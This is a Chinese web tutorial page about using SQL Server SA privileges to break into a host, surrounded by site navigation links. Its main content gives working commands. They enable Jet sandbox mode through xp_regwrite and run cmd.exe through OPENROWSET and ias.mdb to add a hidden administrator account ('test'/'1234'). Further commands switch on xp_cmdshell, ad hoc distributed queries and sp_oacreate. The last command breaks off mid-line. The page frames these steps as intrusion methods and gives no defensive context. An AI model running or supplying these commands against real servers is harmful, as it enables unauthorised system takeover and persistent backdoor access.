解讀SQL Server SA權(quán)限最新入侵方法_Mssql數(shù)據(jù)庫教程
推薦:通過事務(wù)日志解決SQL Server常見四大故障(一)當(dāng)系統(tǒng)出現(xiàn)故障時,只要存在數(shù)據(jù)日志那么就可以利用它來恢復(fù)數(shù)據(jù)解決數(shù)據(jù)庫故障。作為SQL Server數(shù)據(jù)庫管理員,了解數(shù)據(jù)日志文件的作用,以及如何利用它來解決一些數(shù)據(jù)庫的常見故障,這非常重要。既然事務(wù)日志這么重要,那么他到底可以用來做什么事情呢?口說
使用jet沙盤模式,可以解決XP_cmdshell等存儲過程和相關(guān)動態(tài)鏈接庫帶來的煩惱。出于安全原因,系統(tǒng)默認(rèn)情況下沙盤模式未開啟,這就需要xp_regwrite開啟沙盤模式:
| Exec master.dbo.xp_regwrite ''HKEY_LOCAL_MACHINE'',''SOFTWARE\Microsoft\Jet\4.0
\Engines'',''SandBoxMode'',''REG_DWORD'',1 |
然后執(zhí)行沙盤命令,在系統(tǒng)添加一個用戶名為test,密碼為1234的用戶:
| select * from openrowset(''microsoft.jet.oledb.4.0'','';database=c:\windows
\system32\ias\ias.mdb'',''select shell("cmd.exe /c net user test 1234 /add")'') select * from openrowset(''microsoft.jet.oledb.4.0'','';database=c:\windows \system32\ias\ias.mdb'',''select shell("cmd.exe /c net localgroup administrators test /add")'') |
不同的,路徑也不一樣,需要根據(jù)情況做修改:操作系統(tǒng)
NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
另外Microsoft SQL Server2005在默認(rèn)情況下,一些存儲過程是關(guān)閉著的,需要命令打開:
開啟XP_cmdshell:
| EXEC sp_configure ''show advanced options'', 1;RECONFIGURE;EXEC sp_configure
''xp_cmdshell'', 1;RECONFIGURE; |
開啟''OPENROWSET'':
| exec sp_configure ''show advanced options'', 1;RECONFIGURE;exec sp_configure
''Ad Hoc Distributed Queries'',1;RECONFIGURE; |
開啟''sp_oacreate'':
| exec sp_configure ''show advanced options'', 1;RECONFIGURE;exec sp |
分享:通過事務(wù)日志解決SQL Server常見四大故障(二)數(shù)據(jù)庫鏡像方案有兩種鏡像運(yùn)行模式。一種是
- sql 語句練習(xí)與答案
- 深入C++ string.find()函數(shù)的用法總結(jié)
- SQL Server中刪除重復(fù)數(shù)據(jù)的幾個方法
- sql刪除重復(fù)數(shù)據(jù)的詳細(xì)方法
- SQL SERVER 2000安裝教程圖文詳解
- 使用sql server management studio 2008 無法查看數(shù)據(jù)庫,提示 無法為該請求檢索數(shù)據(jù) 錯誤916解決方法
- SQLServer日志清空語句(sql2000,sql2005,sql2008)
- Sql Server 2008完全卸載方法(其他版本類似)
- sql server 2008 不允許保存更改,您所做的更改要求刪除并重新創(chuàng)建以下表
- SQL Server 2008 清空刪除日志文件(瞬間日志變幾M)
- Win7系統(tǒng)安裝MySQL5.5.21圖解教程
- 將DataTable作為存儲過程參數(shù)的用法實例詳解
Mssql數(shù)據(jù)庫教程Rss訂閱編程教程搜索
Mssql數(shù)據(jù)庫教程推薦
- 詳細(xì)解析SQL Server安裝sp4補(bǔ)丁報錯的方法
- 基于SQL Server中char,nchar,varchar,nvarchar的使用區(qū)別
- 解讀經(jīng)典SQL語句大全
- 剖析SQL Server 2005查詢通知之基礎(chǔ)篇
- 也談如何縮小SQL SERVER日志文件
- 如何快速生成100萬不重復(fù)的8位編號
- SQL SERVER 2008 中三種分頁方法與比較
- 解析SQL Server數(shù)據(jù)應(yīng)用在不同的數(shù)據(jù)庫中
- 如何檢測SQL Server是否有特洛伊木馬
- 如何設(shè)定sql server定期自動備份數(shù)據(jù)庫
猜你也喜歡看這些
- mysql出現(xiàn)“Incorrect key file for table”處理方法
- mysql使用source 命令亂碼問題解決方法
- Ubuntu下取消MySQL數(shù)據(jù)庫本機(jī)綁定限制方法
- 如何修改mysql數(shù)據(jù)庫的max_allowed_packet參數(shù)
- 深入SQLite基本操作的總結(jié)詳解
- 基于MYSQL中優(yōu)化的一些方法
- mysql密碼過期導(dǎo)致連接不上mysql
- mysql創(chuàng)建函數(shù)出現(xiàn)1418錯誤的解決辦法
- 怎么重置mysql的自增列AUTO_INCREMENT初時值
- 查詢mysql中執(zhí)行效率低的sql語句的方法
- 相關(guān)鏈接:
- 教程說明:
Mssql數(shù)據(jù)庫教程-解讀SQL Server SA權(quán)限最新入侵方法
。